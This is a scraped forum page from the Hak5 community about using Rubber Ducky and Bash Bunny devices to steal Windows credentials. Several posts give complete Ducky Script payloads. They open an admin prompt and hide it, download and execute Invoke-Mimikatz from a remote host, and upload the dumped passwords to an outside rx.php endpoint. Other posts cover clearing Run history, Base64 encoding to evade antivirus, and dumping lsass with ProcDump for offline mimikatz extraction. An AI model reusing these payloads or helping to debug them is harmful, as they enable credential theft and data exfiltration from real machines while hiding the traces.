Search the Community

DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1

Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it modifying this string in the Powershell script on Rubber Ducky: STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I've found some useful links (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/ and https://blog.den1al.com/2015/02/encoded-mimikatz-powershell-invoker/ but my coding skills are very limited and I'm searching some help to successfully modify the scripts to work with Rubber Ducky. This is my faulty payload: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://htmlguru.tk/im.ps1'))); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://htmlguru.tk/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER Thank you in advance for help!

Hope someone can help. I recently got my rubber ducky and I think I understand ducky script enough, but I've run into two big problems. Regarding mimikatz, it seems that when you download the zip file, it needs to be somewhere for the ducky to find and use it. I don't have a webserver like the video suggests, so where as can you place it? Secondly, can you simply have the password creds emailed you to instead of uploading them to the aforementioned web server? Any help is appreciated!! Thanks!

Be patient with me I am a newbie. I am trying to use rubber ducky and the invoke mimikatz powershell script.\ REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I assume download string downloads the file im.ps1 from the http web site (not darrens of coarse) runs it and dumps results in file rx.php and uploads it webserver via http. I set up a webpage on domain.com and tried to upload im.ps1 but could not, told not allowed. Poweshell file. That is wheree I am stuck. Any help appreciated.

So I tried doing everything that is mentioned in Hak5's episode 2101, but when it goes to execute the .ps1 file, there is an error in the cmd prompt which says: Specified cast is not valid. At line:2179 char:7 + if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_D ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OperationStopped: (:) [], InvalidCastException + FullyQualifiedErrorId : System.InvalidCastException When I look at the .ps1 file through my web server, the error seems to be somewhere here: [IntPtr]$LoadAddr = [IntPtr]::Zero if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue [IntPtr]$LoadAddr = $OriginalImageBase }

Can anyone tell me why the Mimikatz portion of this script is not running? It does create the text files however they are empty. Ima newb as if you didn't know.... Thanks in advance.. @echo off REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-10,1%%time:~-8,2%%time:~-5,2% mkdir %dst% REM Run mimikatz 64bit from SD card and save log file to SD STRING %dst%\x64\mimikatz.exe > %dst%\64.txt ENTER DELAY 1000 STRING priviege::debug ENTER DELAY 1000 STRING sekurlsa::logonPasswords full ENTER REM Run mimikatz 32bit from SD card and save log file to SD STRING %dst%\x32\mimikatz.exe > %dst%\32.txt ENTER DELAY 1000 STRING priviege::debug ENTER STRING sekurlsa::logonPasswords full ENTER DIR C:\*.* > %dst%\dir.txt DIR %USERPROFILE%\Documents\*.* /S >> %dst%\dir.txt @cls @exit

I have setup and confirmed the funcitonality of this payload via tcpdump; but the Invoke mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the php script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture; but if that's not running I don't ever see the creds files the rx.php script is supposed to create.

Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK) How do I run the priv command and then the dump passwords command? if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords Exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command }

I have the Ducky loaded with the invoke-mimikatz script. Inject.Bin runs and saves an output file. Instead of passwords, the file contains the error message listed below: ..... mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list mimikatz(powershell) # exit Bye! I am running the Ducky against an Acer, Win10 laptop. I have Apache and PHP installed locally and I'm using http://localhost for the im.ps1 and rx.php files. I downloaded the IM.ps1 file from GitHub using the link in Darren's Mr. Robot blog. Has anyone encountered this error before ? Any suggestions ? I

hi, everyone ! first off i've been watching AAAA'lot of hak5 and rubber ducky episode's aswell as guides, i wanted to generate my own payload or use the mimikatz one, and i found that everytime i tried to encode the txt in my kali distro, with the command : java -jar duckencode.jar -i script.txt -o inject.bin -l dk java -jar ./duckencode.jar -i script.txt -o inject.bin -l dk java -jar encoder.jar -i script.txt -o inject.bin -l dk also the name of the encoder is ''encoder.jar'' not duckencode, so at this point i dont know what to do ... i hope u guys watching and brewing an idea asap :) best regards Skyee from Denmark

Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimkatz\ProcDump payload. My issue lies in the fact that I have to switch the mimkatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then pluging in, swaping files, and so on. Or having seperate .bins (SHIFT+payload button or CTRL+payload button, ect.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE ***************************************************************************************************************************************************************************** REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card and save log file to disk *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp ENTER REM *** GTFO *** STRING exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> *****************************************************************************************************************************************************************************